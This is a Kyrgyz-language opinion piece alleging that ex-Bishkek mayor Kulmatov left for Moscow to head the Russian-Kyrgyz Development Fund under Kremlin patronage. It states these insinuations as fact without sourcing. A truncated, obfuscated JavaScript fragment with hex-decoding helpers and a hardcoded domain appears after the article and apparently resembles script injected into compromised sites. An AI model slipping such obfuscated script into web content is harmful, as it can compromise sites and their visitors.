Menu

Кулматовдун Кыргызстандагы Галдирбайлар менен Далдирбайлардын “кулагына кесме илген” кеби тура

Бөлүшүү:

“Үй шартыма байланыштуу Москвага кетип жатам” дегени көрсө Бишкектин экс-мэри Кубанычбек Кулматовдун Кыргызстандагы Галдирбайлар менен Далдирбайлардын “кулагына кесме илген” кеби тура.

Анын “үйү” Москвада экенин билип жүргүлө. Үйдө ким болот: албетте акыл-кеңеш айткан атасы болот. Атасынын аты ким экенин да билесиңер. Орус-кыргыз өнүктүрүү фондусун Москва эми ишеничтүү колго берди. Буга чейин 350 млн доллар уставдык фондудагы каражаттын 265 млн доллары Россиянин банктарында 4% үстөк менен эмнеге кармалып жатканын депутаттар чырылдап айтып чыгышты эле – эми анын чыныгы себеби да билине баштады.

Ажобуз Атамбаевди Москвадагы “атабыз” Путин арыдан-бери жөн жеринен чакырды дейсиздерби? “Алдыда президенттик шайлоо келатат, Алмазбек Шаршенович” деп бир ооз кыйытып койгондун өзү түшүнүктүү го. Анан фонддун жетекчиси Кулматов болбогондо Бекназаров же Келдибеков болмок беле?

16-мартта Т.Сариев К.Кулматов менен анын жаңы орун басары, “Айылбанктын” экс-жетекчиси Э. Асрандиевди жамаатка тааныштырып жатып, “кыска убакыттын ичинде натыйжалуу жыйынтык көрсөтүшү керек” деп кыйытты. Мурдагы жетекчиликтин ишине “өлкө жетекчилиги, коомчулук жана бизнес чөйрө тарабынан бир катар сындар айтылганын” да эскертти.

Жөргөмуштүн жөтөлгөнүнө  чейин билип турчу кыйды саясатчылар эми акырындап Кулматов тарапка мурундарын көтөрүп, жыт искей башташыптыр. Алардын мээлеринен да мурундары жакшы иштейт.

 Булак: “Ачык саясат”

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kyrgyztoday.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Эгер бул тексттен ката таап калсаңыз, ошол ката сөздү белгилеп, Ctrl+Enter кнопкаларын чоогу басуу менен билдирип коюңуз.

КОММЕНТАРИЙ КАЛТЫРУУ

Төмөндө көрсөтүлгөн уячаларга керектүү маалыматтарды туура киргизгениңизди текшериңиз.HTML-код киргизүүгө уруксат жок.

Captcha 59 − 53 =

ОКШОШ МАКАЛАЛАР

Меню

Орфографиялык ката тууралуу Отчет

Редакцияга төмөнкү текст жөнөтүлөт: